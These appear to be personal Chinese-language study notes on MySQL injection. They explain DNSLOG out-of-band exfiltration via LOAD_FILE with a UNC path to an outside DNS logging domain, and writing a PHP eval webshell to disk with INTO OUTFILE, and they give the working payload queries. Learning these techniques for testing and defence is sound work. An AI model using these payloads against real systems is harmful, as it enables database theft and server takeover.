注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!!
一、DNSLOG的使用场景
DNS-LOG:DNS服务(LOG日志)=>DNS解析日志
dns-log注入:obb(数据外带)
假设你在SQL注入的时候,让数据库发起网络请求,然后就会记录你的内容
database().hjw.com =>日志就会记录
使用场景:
1.目标是盲注 盲注=>转换为dnslog注入
2.目标可以访问外网
二、DNSLOG的函数解析
Mysql函数:LOAD_FILE()
load_file 读取文件的函数
LOAD_FILE(绝对路径) 记得反斜杠
mysql稍微高一点的版本,默认是不可以读取内容的
mysql.ini => 末尾添加 secure_file_priv=""
文件共享(UNC路径)访问的东西都是把他当做文件处理
\\desktop-admin\123\ 支持域名支持ip
select load_file(concat('//',database(),'.75a1bbbd.dnsbug.cn/123'));
DNS-LOG注入 linux能不能用的话[一般不能dnslog注入,除非搭建smb服务]
写shell:
load_file 开启了就能写shell
webshell =>网站木马
<?php eval($_REQUEST[8])?> => 当做后端代码执行
into outfile into dumpfile
select "<?php eval($_REQUEST[8])>?" into outfile "F:/1.php";